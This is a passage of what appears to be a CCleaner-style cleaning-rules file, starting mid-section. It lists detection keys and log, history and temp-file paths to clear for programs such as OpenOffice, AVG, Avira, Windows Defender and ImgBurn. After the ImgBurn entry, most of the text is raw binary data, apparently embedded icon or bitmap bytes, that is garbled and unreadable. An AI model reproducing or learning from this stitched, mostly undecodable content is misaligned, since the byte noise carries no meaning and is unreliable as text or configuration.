RegKey14=HKCU\Software\Paint.NET|MRU5Thumb
RegKey15=HKCU\Software\Paint.NET|MRU6Thumb
RegKey16=HKCU\Software\Paint.NET|MRU7Thumb

[OpenOffice 1.14]
ID=2125
LangSecRef=3021
DetectFile=%ProgramFiles%\OpenOffice.org1.1.4\program\soffice.exe
Default=True
FileKey1=%ProgramFiles%\OpenOffice.org1.1.4\user\registry\data\org\openoffice\Office|Common.xcu

[OpenOffice 2.0]
ID=2126
LangSecRef=3021
Detect=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\2.0
Default=True
FileKey1=%appdata%\OpenOffice.org2\user\registry\data\org\openoffice\Office|Common.xcu

[OpenOffice 2.1]
ID=2127
LangSecRef=3021
Detect=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\2.1
Default=True
FileKey1=%appdata%\OpenOffice.org2\user\registry\data\org\openoffice\Office|Common.xcu

[OpenOffice 3.1]
ID=2143
LangSecRef=3021
Detect=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\3.1
Default=True
FileKey1=%appdata%\OpenOffice.org\3\user\registry\data\org\openoffice\Office|Histories.xcu

[Grisoft AVG 7.0]
ID=2128
LangSecRef=3024
Detect=HKLM\SOFTWARE\Grisoft\Avg7
Default=True
FileKey1=%commonappdata%\Grisoft\Avg7Data|*.log
FileKey2=%commonappdata%\Grisoft\Avg7Data\upd7bin|*.*
FileKey3=%commonappdata%\Grisoft\Avg7Data\$history|*.*
FileKey4=%commonappdata%\Grisoft\Avg7Data\avg7upd|*.log
FileKey5=%windir%\All Users\Application Data\Grisoft\Avg7Data\upd7bin|*.*
FileKey6=%windir%\All Users\Application Data\Grisoft\Avg7Data\avg7upd|$history
FileKey7=%windir%\All Users\Application Data\Grisoft\Avg7Data\avg7upd|*.log
FileKey8=%windir%\All Users\Application Data\Grisoft\Avg7Data|*.log
FileKey9=%windir%\Application Data\AVG7\Log|*.log

[AVG AntiVirus 8.0]
ID=2141
LangSecRef=3024
Detect=HKLM\SOFTWARE\AVG\Avg8
Default=True
FileKey1=%allusersprofile%\Application Data\avg8\Log|*.log
FileKey2=%allusersprofile%\Application Data\avg8\scanlogs|*.log
FileKey3=%allusersprofile%\Application Data\avg8\Log|*.xml
FileKey4=%allusersprofile%\Application Data\avg8\update\backup|*.*
FileKey5=%allusersprofile%\Application Data\avg8\Emc\Log|*.log

[AVG AntiVirus 9.0]
ID=2145
LangSecRef=3024
Detect=HKLM\SOFTWARE\AVG\Avg9
Default=True
FileKey1=%allusersprofile%\Application Data\avg9\Log|*.log
FileKey2=%allusersprofile%\Application Data\avg9\scanlogs|*.log
FileKey3=%allusersprofile%\Application Data\avg9\Log|*.xml
FileKey4=%allusersprofile%\Application Data\avg9\update\backup|*.*
FileKey5=%allusersprofile%\Application Data\avg9\Emc\Log|*.log


[AntiVir Desktop]
ID=2138
LangSecRef=3024
Detect=HKLM\SOFTWARE\Avira\AntiVir Desktop
Default=True
FileKey1=%commonappdata%\Avira\AntiVir Desktop\TEMP|*.*
FileKey2=%ProgramFiles%\Avira\AntiVir Desktop|*.old
FileKey3=%ProgramFiles%\Avira\AntiVir Desktop|*.tmp
FileKey4=%ProgramFiles%\Avira\AntiVir Desktop\FAILSAFE|*.tmp

[TUGZip]
ID=2131
LangSecRef=3024
Detect=HKCU\Software\TUGZip
Default=True
RegKey1=HKCU\Software\TUGZip|mainRecent
RegKey2=HKCU\Software\TUGZip|extrRecent
RegKey3=HKCU\Software\TUGZip|cmpWorkingDir

[Windows Defender]
ID=2132
LangSecRef=3024
Detect=HKLM\SOFTWARE\Microsoft\Windows Defender
Default=True
FileKey1=%commonappdata%\Microsoft\Windows Defender\Scans\History\Results\Quick|*.*
FileKey2=%commonappdata%\Microsoft\Windows Defender\Scans\History\Results\Resource|*.*

[IZArc]
ID=2133
LangSecRef=3024
Detect=HKCU\Software\IZSoftware\IZArc
Default=True
RegKey1=HKCU\Software\IZSoftware\IZArc|AppCurrentDir
RegKey2=HKCU\Software\IZSoftware\IZArc\Recent
RegKey3=HKCU\Software\IZSoftware\IZArc\History

[Google Toolbar Firefox]
ID=2134
LangSecRef=3022
Default=True
SpecialDetect=DET_MOZILLA_GOOGLE_TOOLBAR
SpecialKey1=N_MOZ_GOOGLE_TOOLBAR

[MS Office Picture Manager]
ID=2135
LangSecRef=3021
Detect=HKCU\Software\Microsoft\Office
Default=True
FileKey1=%LocalAppData%\Microsoft\OIS|OIScatalog.cag
FileKey2=%LocalAppData%\Microsoft\OIS\thumbnails|*.*

[ImgBurn]
ID=2136
LangSecRef=3021
Detect=HKCU\Software\ImgBurn
Default=True
FileKey1=%AppData%\ImgBurn|ImgBurn.log
FileKey2=%AppData%\ImgBurn\Log Files|ImgBurn.log
PA(   -   :          �(                  ��� ���                                                                                     	                                                           ��� ��� ��� ���                                             	               #   &   '   '   '   $                   	                                                ��� ��� ��� ���                                                 '   /   7   =   A   C   C   A   =   9   3   ,   $            	                                         ��� ��� ��� ���                                 	         '   3	F)SA~9pY�>~c�=�e�>�h�?�g�=�d�<y`�9nX�.YF�/&_>   3   (                                              ��� ��� ��� ���                              
         ->.[H�>�g�:�h�8�h�9�j�:�l�>�o�@�p�@�p�@�m�>�i�=�f�>�e�<v]�+SA�D   3   %                                       ��� ��� ��� ���                          
          2&U<{c�<�l�5�k�8�p�>�w�G��S���\���d���h���i���b���W���H�u�?�j�<�e�>y`�%I:x   <   +         	                          ��� ��� ��� ���                                32)`?�j�8�m�2�o�5�v�>��G���N���U���]���f���q���}�����憾��}���f���N�y�>�j�=�e�8kU�	J   /         	                      ��� ��� ��� ���                            00$Z=�m�5�p�/�s�0�z�3���5���6���5���5���6���:���A���N���b���{���Ƶ�Ƕ愺��a���D�p�;�f�=x_� S   1                           ��� ��� ��� ���                        +I>�k�6�r�,�u�)�z�)���'���'���%���$���$���$���$���&���)���1���B���^������˼�ƶ�r���K�v�;�f�=y_� T   /                       ��� ��� ��� ���                     $   ;8w`�:�v�-�w�&�{�%���#���$���$���&���(���)���*���*���(���(���'���(���0���G���n���ʹ�˽�{���M�x�:�e�=v^�H   ,                    ��� ��� ��� ���                    2"H;o?�w�2�z�(�~�$���#���%���(���+���/���1¤�2���3���3���2���1���.���+���(���+���<���c���ɹ�;�z���I�u�:�d�8jV�=   &      	          ��� ��� ��� ���                 &   ??�p�7�{�-���'���%���(���+���0���3ũ�7ȭ�9ɯ�;ȯ�<Ȱ�<Ȱ�;Ǯ�:Ŭ�8���5���0���,���+���8���`���ɹ�˽�n���@�n�<�d�(M<}   4                ��� ��� ��� ���                1'SDu?�|�2���*���'���)���.���2ħ�7ǭ�;̱�?ε�AϷ�Dѹ�Gѻ�Gк�Fθ�D̶�Aȳ�>Ʈ�;©�5���/���,���9���h���̽�ŵ�[���;�g�=}a�J   )      
      ��� ��� ��� ���             "   ;?�n�:���0���*���)���.���2ç�9Ȯ�=γ�Bи�HӼ�P���W���\���^���\���Y���SѾ�K͹�Dɳ�>Ĭ�8���1���.���B���v���Ϳ�~���F�t�:�d�3_L�   5            ��� ��� ��� ���             )NC�}�5���.���,���-���2¦�9ɭ�?δ�Fѹ�R���^���g���o���u���x���w���s���k���a���Uҿ�I̷�@ĭ�9���1���1���R���Ƶ�Ƕ�]���:�h�?}d�F   '         ��� ��� ��� ���       
      /)WGw@���4���.���-���1���7ǫ�>Ͳ�Iһ�[���m���z������������������������x���j���[���K̷�@ĭ�9���1���:���k���ɺ�u���A�q�;�d�*M>y   /      
   ��� ��� ��� ���             57wb�=���3���/���0���4Ħ�=ʯ�LҺ�d���}������������������������������������n���[���Iɶ�@ª�6���3���Q���Ų憾��N�~�9�f�:jW�   5         ��� ��� ��� ���              9@�p�;���3���0���2���9ƪ�I϶�g��������������������������������������������������k���VϾ�EƱ�<���4���A���r���±�Z���9�g�Ayb�   ;   !      ��� ��� ��� ���          "   <B�w�;���4���2���5¤�Aʯ�`��������������������������������������������������������y���a���N˸�A«�7���9���a������d���=�l�E�h�   =   $      ��� ��� ��� ���          #   =C�{�<���6���4���9ç�Oζ���������������������������������������������������������������l���UϽ�EŰ�;���7���U���~���h���?�o�H�m�   ?   %      ��� ��� ��� ���          #   =C�z�>���7���6���=Ĩ�aӽ����������������������������������������������������������������s���[���HƳ�>���7���M���u���f���A�q�L�p�   >   $      ��� ��� ��� ���          !   ;C�x�?���8���7���Bƫ�s��������������������������������������������������������������������x���_���Kɵ�@���8���I���m���a���A�r�N�o�   <   "      ��� ��� ��� ���             8@�o�A���:���9���FǬ�~��������������������������������������������������������������������y���`���Mʷ�A���9���H���g���Z���D�r�Q~l�   8          ��� ��� ��� ���             35q]�D���<���9���Hƫ���������������������������������������������������������������������v���_���Lȶ�A���:���J���`���R���I�v�Ik]�   3         ��� ��� ��� ���       	      ,A7aH���>���;���EŨ�}��������������������������������������������������������������������r���[���Kȴ�@���;���J���Y���K��V��):2^   ,      	   ��� ��� ��� ���             %?H���A���<���B���nӽ�����������������������������������������������������������������k���Wп�JƲ�?���=���K���P���F�{�b���   ?   &         ��� ��� ��� ���                47s`�G���@���?���Zʲ�������������������������������������������������������������|���d���Rͻ�Gî�>���@���I���F���N�~�X|n�   6            ��� ��� ��� ���           	      )JJ���C���?���H¦�y�����������������������������������������������������������s���[���O˸�D���=���?���B���A�{�e���&$U   ,      
       ��� ��� ��� ���                    54n[�I���B���@���Wȯ��������������������������������������������������������f���Uξ�Jǳ�A���;���=���;���G�|�d�~�   <   #             ��� ��� ��� ���              
      '@G�|�H���B���E���^˳������������������������������������������������m���Z���P̺�E���>���9���7���9�y�_���5GAg   1                ��� ��� ��� ���                        -'RK���G���B���G���[ʳ����������������������������������������n���]���Sо�Kɴ�A���9���5���5��@�z�f���   @   '                 ��� ��� ��� ���                           3>4aL���H���E���G���RȰ�hӿ����������������������w���h���]���U���Nκ�EĮ�=���5���3���6�y�U���>VMs   3                    ��� ��� ��� ���                      	      !   3:0^K���I���E���E���Jƭ�R̶�]ҿ�f���k���l���o������f���Z���U���Oѽ�Hʴ�@���8���2���3��;�x�Z�~�   A   (                     ��� ��� ��� ���                          
      !   3(!WH���J���F���D���FŬ�Jʳ�NϹ�RӾ�Z���������������Y���PӾ�Jθ�BƮ�;���4���2���5�{�H�{�7XLz   4                        ��� ��� ��� ���                             
          3MB�y�H���D���C���Dƭ�F˳�Jϸ�_���������������`���Iк�Cɱ�<���5���0���1���:�w�K�s�D   )      	                   ��� ��� ��� ���                                 
          3NA�z�K���F���A§�Aǭ�D˲�Iи�����������KҺ�Cδ�=Ū�7���1���0���3�z�@�w�/UH   5                            ��� ��� ��� ���                                     	      #   8"^P���_���D���<ç�>Ƭ�?˱�Dϵ�LӺ�Eѷ�@δ�<ȭ�7���0���.���0��6�v�?�k�E   )      	                      ��� ��� ��� ���                                          
      )   BD�x�qí�\ū�:���7¥�:ƪ�<ʮ�=ͱ�<̰�9ɭ�5å�0���,���+���0�z�;�t�%K>|   8                                 ��� ��� ��� ���                                                    4)VIvh���~͸�A���3���3¤�4ŧ�Rϵ�Aʮ�2å�.���*���'���*�}�2�u�;�k�K   -      
                          ��� ��� ��� ���                                                     )		ET��Ѝμ�Z¨�1���.���6����������+���'���$���%��*�w�5�q�7r\�   =   $                                 ��� ��� ��� ���                                                        59ub�x���κ�@���+���)���Lũ�5���$���!��� ���$�y�+�q�:�o�*UD�   3                                    ��� ��� ��� ���                                                   
      )GX��ҏͻ�oǯ�5���'���#���!��� �������z�&�s�/�n�?�m�Q   )      	                               ��� ��� ��� ���                                                            1+ZJqe���̷�[���/���#����������|�#�u�*�p�8�n�;xa�   9   !                                     ��� ��� ��� ���                                                            !   65n[�]���e���C���)���!�~� �z�"�u�)�q�4�o�B�q�?1c   ,                                        ��� ��� ��� ���                                                                %   ;'RCwC��?���0�}�&�v�&�s�+�q�4�q�B�t�5nX�   3                                             ��� ��� ��� ���                                                                   )   A[(SG�1va�-�k�0�m�6�n�=�j�+\I~   4   "      
                                      ��� ��� ��� ���                                                                        6   N46<�AGL�DMP�2::�	\   D   1   !                                                ��� ��� ��� ���                                                                        3KLPY�Xch�U^c�%&)y   C   /         
                                             ��� ��� ��� ���                                                                        3)+1mZbk�jz�X_f�G   2                  BBB                                     ��� ��� ��� ���                                                                     $   9FJT�gt|�o���EKQ�   8   $               BBB BBB                                     ��� ��� ��� ���                                                               
      +JY_j�q���hu}�%',a   /         BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                     2;?H�dnw�u���X`i�?   '         BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                  5RYc�o��o��DIQ�   4             BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                  ,.4T^fp�v���cmv�').\   *         BBB BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                 :>EbW]h�_gq�U[f�1   !         BBB BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                 "HNV~VZe�@CMm   "            BBB BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                                                                                                          ��� ��� ��� ���                                                                  	                                                                                        ��� ��� (               x                   yyyyyyyyyyyyyyyyyy  @@@@@@@@@@@@@@@@@@  FFFFFFFFFFFFFFFFFF  JJJJJJJJJJJJJJJJJJ  NNNNNNNNNNNNNNNNNN  PPPPPPPPPPPPPPPPPP  (               x                   ggggggggglllssswww  ggghhhrrrjjjOOOBBB  gggqqq\\\<<<???BBB  mmmjjj===@@@DDDGGG  uuuJJJ???DDDHHHKKK  xxx@@@BBBGGGKKKNNN  (               x                   wwwssslllggggggggg  BBBOOOjjjrrrhhhggg  BBB???<<<\\\qqqggg  GGGDDD@@@===kkkmmm  KKKHHHDDD???KKKuuu  NNNKKKGGGBBB???xxx  (               x                   yyy@@@FFFJJJNNNPPP  yyy@@@FFFJJJNNNPPP  yyy@@@FFFJJJNNNPPP  yyy@@@FFFJJJNNNPPP  yyy@@@FFFJJJNNNPPP  yyy@@@FFFJJJNNNPPP  (               x                   PPPNNNJJJFFF@@@yyy  PPPNNNJJJFFF@@@yyy  PPPNNNJJJFFF@@@yyy  PPPNNNJJJFFF@@@yyy  PPPNNNJJJFFF@@@yyy  PPPNNNJJJFFF@@@yyy  (               x                   PPPPPPPPPPPPPPPPPP  NNNNNNNNNNNNNNNNNN  JJJJJJJJJJJJJJJJJJ  FFFFFFFFFFFFFFFFFF  @@@@@@@@@@@@@@@@@@  yyyyyyyyyyyyyyyyyy  (               x                   xxx@@@BBBGGGKKKNNN  uuuJJJ???DDDHHHKKK  mmmjjj===@@@DDDGGG  gggqqq\\\<<<???BBB  ggghhhrrrjjjOOOBBB  ggggggggglllssswww  (               x                   NNNKKKGGGBBB@@@xxx  KKKHHHDDD???KKKuuu  GGGDDD@@@===kkkmmm  BBB???<<<\\\qqqggg  BBBOOOjjjrrrhhhggg  wwwssslllggggggggg  (               x                   ������������������  ``````````````````  ffffffffffffffffff  hhhhhhhhhhhhhhhhhh  hhhhhhhhhhhhhhhhhh  hhhhhhhhhhhhhhhhhh  (               x                   gggggggggsss������  gggiii������mmmddd  gggyyy```ccceee  vvv���aaadddggghhh  ���iiicccggghhhhhh  ���bbbeeehhhhhhhhh  (               x                   ������sssggggggggg  dddmmm������iiiggg  eeeccc```yyyggg  hhhgggdddaaa���uuu  hhhhhhgggcccjjj���  hhhhhhhhheeeaaa���  (                   �  �          ���```fffhhhhhhhhh  ���```fffhhhhhhhhh  ���```fffhhhhhhhhh  ���```fffhhhhhhhhh  ���```fffhhhhhhhhh  ���```fffhhhhhhhhh  (               x                   hhhhhhhhhfff```���  hhhhhhhhhfff```���  hhhhhhhhhfff```���  hhhhhhhhhfff```���  hhhhhhhhhfff```���  hhhhhhhhhfff```���  (               x                   hhhhhhhhhhhhhhhhhh  hhhhhhhhhhhhhhhhhh  hhhhhhhhhhhhhhhhhh  ffffffffffffffffff  ``````````````````  ������������������  (               x                   ���bbbeeehhhhhhhhh  ���iiicccggghhhhhh  vvv���aaadddggghhh  gggyyy```cccddd  gggiii������mmmddd  gggggggggsss������  (               x                   hhhhhhhhheeebbb���  hhhhhhgggcccjjj���  hhhgggdddaaa���uuu  dddccc```yyyggg  dddmmm������iiiggg  ������sssggggggggg  (               x                   LLLLLLLLLLLLLLLLLL  ������������������  ������������������  ������������������  ������������������  ������������������  (               x                   ggggggggg___TTTOOO  gggeeeWWWccc������  gggWWWxxx���������  ]]]ccc������������  RRR���������������  NNN���������������  (               x                   OOOTTT___ggggggggg  ������cccWWWeeeggg  ���������xxxWWWggg  ��ʾ��������bbb^^^  �����ξ��������SSS  ��������ʶ�����MMM  (                   �  �          LLL���������������  LLL���������������  LLL���������������  LLL���������������  LLL���������������  LLL���������������  (               x                   �����������ǰ��LLL  �����������ǰ��LLL  �����������ǰ��LLL  �����������ǰ��LLL  �����������ǰ��LLL  �����������ǰ��LLL  (               x                   ������������������  ������������������  ������������������  ������������������  ������������������  LLLLLLLLLLLLLLLLLL  (               x                   NNN���������������  RRR���������������  ]]]ccc������������  gggWWWxxx���������  gggeeeWWWccc������  ggggggggg___TTTOOO  (               x                   ��������л�����NNN  ��������ǳ�����SSS  �����ɹ�����bbb^^^  ��ø�����xxxWWWggg  ������cccWWWeeeggg  OOOTTT___ggggggggg  (   -   :          �(                  ��� ���                                                          	                     
                                                                 ��� ��� ��� ���                                                
                                                                                             ��� ��� ��� ���                                                       %   )   +   ,   ,   +   )   &   "               
                                            ��� ��� ��� ���                                             "/IIITdddvooo�rrr�sss�sss�ooo�jjj�bbbwOOO^)))?)   "                                                 ��� ��� ��� ���                                       )PPP[rrr�uuu�uuu�www�xxx�{{{�|||�{{{�zzz�www�ttt�rrr�hhh�IIIX-   "         
                                 ��� ��� ��� ���                                   !!!!8mmm�xxx�xxx�}}}�����������������������������������������www�rrr�kkk�@@@P   (                                      ��� ��� ��� ���                               "---@www�yyy�|||���������������������������������������������������������vvv�qqq�___r1                                  ��� ��� ��� ���                      
       )))<xxx�|||�~~~�����������������������������������������������������������������|||�rrr�jjj�7                               ��� ��� ��� ���                        1vvv��������������������������������������������������������������������������������sss�jjj�8         
                 ��� ��� ��� ���                        'iiip������������������������������������������������������������������������������������������qqq�iii�0                       ��� ��� ��� ���                    !@@@J������������������������������������������������������������������������������������������ę��������qqq�___s)                   ��� ��� ��� ���                    *yyy���������������������������������������������������������������������������������������������������zzz�qqq�DDDS   #      
          ��� ��� ��� ���                 JJJN����������������������������������������������������������������������������������������������������������ttt�nnn�1               ��� ��� ��� ���                'wwwz����������������������������������������������Ù��ř��ř��Ù������������������������������������������Ù��������qqq�TTTd   #      
      ��� ��� ��� ���             4������������������������������������������ř��ə��̙��͙��ϙ��Ι��͙��ə��ř����������������������������������������ttt�ooo�/            ��� ��� ��� ���             MMMO����������������������������������ę��˙��љ��ԙ��֙��ؙ��ٙ��ٙ��֙��ҙ��Ι��ș������������������������������������|||�qqq�EEEP            ��� ��� ��� ���             #jjjh������������������������������Ǚ��љ��י��ۙ��ߙ������������������ܙ��י��љ��˙������������������������������������rrr�```n   #         ��� ��� ��� ���       
      &yyyy��������������������������ƙ��ԙ��ܙ����������������������������������ٙ��Й��ə��������������������������������ttt�kkk�   '      
   ��� ��� ��� ���       
      (�������������������������ՙ��ߙ������������������������������������ߙ��ؙ��Ι��Ù����������������������������yyy�sss�   )         ��� ��� ��� ���             )��������������������������Ι��ߙ����������������������������������������������ݙ��ԙ��ə����������������������������{{{�xxx�   *         ��� ��� ��� ���             )��������������������������ٙ�������������������������������������������������������י��͙����������������������������}}}�zzz�   )         ��� ��� ��� ���       
      '����������������������Ǚ����������������������������������������������������������ٙ��Ι��������������������������}}}�www�   (      
   ��� ��� ��� ���       	      %xxxs������������������ʙ�����������������������������������������������������������ڙ��ϙ��������������������������~~~�ttts   %      	   ��� ��� ��� ���             "ddd^������������������˙�����������������������������������������������������������ؙ��͙��������������������������������ccc\   "         ��� ��� ��� ���             :::A������������������ș����������������������������������������������������������ߙ��ՙ��̙��������������������������������666>            ��� ��� ��� ���             *�����������������������������������������������������������������������������ݙ��ә��ʙ��������������������������������   *            ��� ��� ��� ���          	      #ggg_������������������֙�����������������������������������������������������ڙ��љ��ř����������������������������sssc   $      	      ��� ��� ��� ���                 1������������������ƙ���������������������������������������������������י��͙��������������������������������$$$8                ��� ��� ��� ���              
      #aaaZ������������������Й������������������������������������������ݙ��ҙ��Ǚ�������������������������������t   (                ��� ��� ��� ���                    +���}������������������љ�������������������������������������י��˙��������������������������������DDDD                    ��� ��� ��� ���                        """7����������������������ʙ��ۙ�����������������������ޙ��֙��͙��ę�������������������������������}   +                    ��� ��� ��� ���                           "777A��������������������������͙��י��ܙ��ޙ��ޙ��ۙ��֙��љ��̙��ƙ��������������������������������PPPL   "                    ��� ��� ��� ���                               "444>������������������������������ƙ��ə��˙��͙��ԙ��˙��ƙ��Ù��������������������������������   +                        ��� ��� ��� ���                                   "###:����������������������������������Ù������������ę��������������������������������PPPQ   #      	                  ��� ��� ��� ���                                      "3x��������������������������Ù������������ƙ����������������������������}}}�-                            ��� ��� ��� ���                                          "4���|��������������������������ܙ�����ݙ��������������������������������MMMU   #      
                      ��� ��� ��� ���                                              %>����������������������������������������������������������������uuu�.                               ��� ��� ��� ���                                                   ,���w���������������������������������������������������������CCCS   %      
                          ��� ��� ��� ���                                              	      #MMMO��������������������������������������������������������www�2                                   ��� ��� ��� ���                                                     			.�����������������������������˙��������������������}}}�eeet   )                                    ��� ��� ��� ���                                                  
      #iii`��������������������������������������������}}}�{{{�KKKX   "                                    ��� ��� ��� ���                                                         /�����������������������������������������zzz�zzz�6                                        ��� ��� ��� ���                                                      
       PPPK������������������������������������|||�zzz�kkkw   &                                        ��� ��� ��� ���                                                               $bbbY����������������������������~~~�|||�}}}�777B                                           ��� ��� ��� ���                                                                   'IIIO�����������������~~~�~~~��aaae   "                                            ��� ��� ��� ���                                                                      +=KKKriii�uuu�yyy�{{{�uuu�QQQT   #                                               ��� ��� ��� ���                                                                 
      $   4777tGGG�MMM�999z=   -                                                       ��� ��� ��� ���                                                                        "2RRR�ddd�^^^�'''P   ,                                                         ��� ��� ��� ���                                                                  	      "---Iddd�zzz�```�/   !                  BBB                                     ��� ��� ��� ���                                                                        &MMMnttt�����LLLh   %                  BBB BBB                                     ��� ��� ��� ���                                                                     1bbb�����vvv�(((A            BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                     !AAAYppp�����bbb�*            BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                              
   #[[[���������KKKe   #      
      BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                              
   0008iii�����nnn�***=            BBB BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                              
   ???A```�iii�^^^�             BBB BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                 OOOT]]]�EEEI               BBB BBB BBB BBB BBB BBB                                     ��� ��� ��� ���                                                                 
                  
                                                                      ��� ��� ��� ���                                                                              
                                                                            ��� ��� (   7   :          �1                                                                                                                                                                                                                                                                                                                                        
  "
                                                                                                                                                     3K"a  /w  E�!Q�##]�"!`�!_�! ^�""Z�!M�  =�&� t` G,                                                                                                                              	$"K!!Q�# x�$ ��$ ��%!��% ��% ��% ��% ��% ��% ��% ��% ��% ��% ��$ ��$!��#!��"!x�"!N�#� _0                                                                                                         
0!!^z# ��% ��% ��% ��% ��% ��% ��% ��% ��% ��& ��& ��& ��& ��& ��% ��% ��% ��% ��% ��% ��% ��%!��# ��!=�!s5                                                                                             " r}$!��% ��% ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��% ��$ ��$!��  6�!d                                                                                  "SC$!��% ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��$ ��#!f�"�3                                                                         
" {g$ ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��% ��$!��(� ?                                                                  	#!�z$��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��#!��+� >                                                          $"�x$��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��%!��&�2                                                  " �_$��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��$"�� �                                              �7%��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��#"c�!b                                    O$ ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��%��#������ ��%��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��$ ��  4�5                                  $ ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��%��#����}�*}� >��5}�Q���%��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��$!�� t                            �0%��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��$��"����|�,�"C��*Z��,_��,_��,_��#G��	O���$��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��! @�!6                          $��% ��& ��& ��& ��& ��& ��& ��& ��& ��%��$��"����{�1��$I��,_��,`��,_��,_��,_��,_��,_��;w��*O�$���$��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��#!��!j
                    �1$��% ��& ��& ��& ��& ��& ��%��$��"����|� 8��'S��/h��/g��.e��-c��-b��,`��,_��,_��,_��,_��C���G���;_�   m  ($�$��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��$ ��.�"                    $��% ��& ��& ��& ��%��$��!����!~�"@��,_��3u��2r��1o��0l��/j��/g��.e��-c��-a��,`��,_��,_��:v��I���H���D���&=�   R   "�_$��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��" j�H               
$ ��% ��%��$��!����&��%I��1m��8���7��6|��4x��3u��2r��1o��0l��/i��.g��.f��0i��4o��?���K���M���J���H���E���=x���   -   #��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��$"��"p
            # �O% ��$����+��(R��5{��<���;���:���9���8���7��5{��4x��3u��2r��3q��9z��@���J���Q���U���S���V���S���K���I���E���B���*S��   q   �$��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% �� +�            &#��% ��)@��7���=���=���=���=���<���;���:���9���8���6��8��A���J���S���W���Z���Y���X���V���R���Q���T���O���I���F���C���?~��,�   <   $�i% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��% ��% ��$��!!y\           ���&!��*9��<���=���=���=���>���=���=���<���;���?���H���R���X���Z���Z���Y���X���W���U���T���S���R���M���N���S���L���F���C���@���.]��   {   �
$��% ��& ��& ��& ��& ��& ��% ��% ��% ��% ��$��# ��"�a�               ]]�$ ��5j��=���=���=���=���=���>���C���O���X���]���\���[���Z���X���W���V���T���R���Q���P���N���L���N���G���J���S���F���B���@���>~��*J�   E   #��% ��& ��% ��% ��% ��% ��$ ��$��# ��"�J
                            3.�<% ��8y��=���=���=���D���Q���]���`���]���\���Z���Z���X���W���U���T���R���Q���O���O���M���J���E���F���I���?���H���R���A���?���?���Wb{��   K�X% ��% ��% ��$��$��$ �#�2                                           # �]&#��:e��K���T���b���b���_���]���\���Z���X���S���T���[���U���R���P���O���M���I���I���P���I���D���=���A���D���8���I���L���>���?���eiu�9x��	�3;$��#��$�h�                                                       #!�z()��4E��Hl��v���t���f���\���Z���X���Y���V���O���C���L���[���R���M���K���J���F���>���D���R���C���?���7}��@���>���3���I���D���T~��rdS�@���%Q��   a  8                                                                    $!��+.��8J��7I��;R��f���s���g���Y���M���L���V���T���I���6���C���]���P���G���E���C���@���4~��A���R���?��<{��3x��@���9��1���E���ev��H���=���P{���   C                                                                   %!��.3��;O��:N��8L��8J��Ov��n���g���Y���D���=���Q���R���G���1���;���[���M���A���?���>}��;y��0y��?���L���;x��:y��5y��D���Gy��fq~�rhX�<���=���a���}I� �   /                                                               &#��29��BW��@V��>T��=Q��;O��@Y��`���f���Z���G���6���J���Q���F���3��6���W���L���=z��<w��;u��9t��6u��N���\r��\r��es��dp~�F���7���5���<���<���}}q��\�c;�   �                                                               %"��@I��]u��Zr��Vn��Sk��Qh��Ne��Kb��X���c���Y���L���:���A���P���D���7~��3���P���I���;s��Hp��j^\�qgg�[p��]x��B���<���;���8���<���=���6���l����uC��g"��`	�F+�   l                                                           &#��V]���������������������������������{���l���Y���M���?���<���M���E���bo��Yx��i{��Ro��Ts��Kw��:���:���4���;���@���Y���yn��g-��]��k4���P�ʘf���R��m$��b�'�   F                                                       %!��T[������������������������������������������x���_���M���N���jw��veK�F���;y��Jx��D���E���<���?���Y���u���i���x�|��g��f��c��a��f��z@�˚g�Ҥq���L��j��R
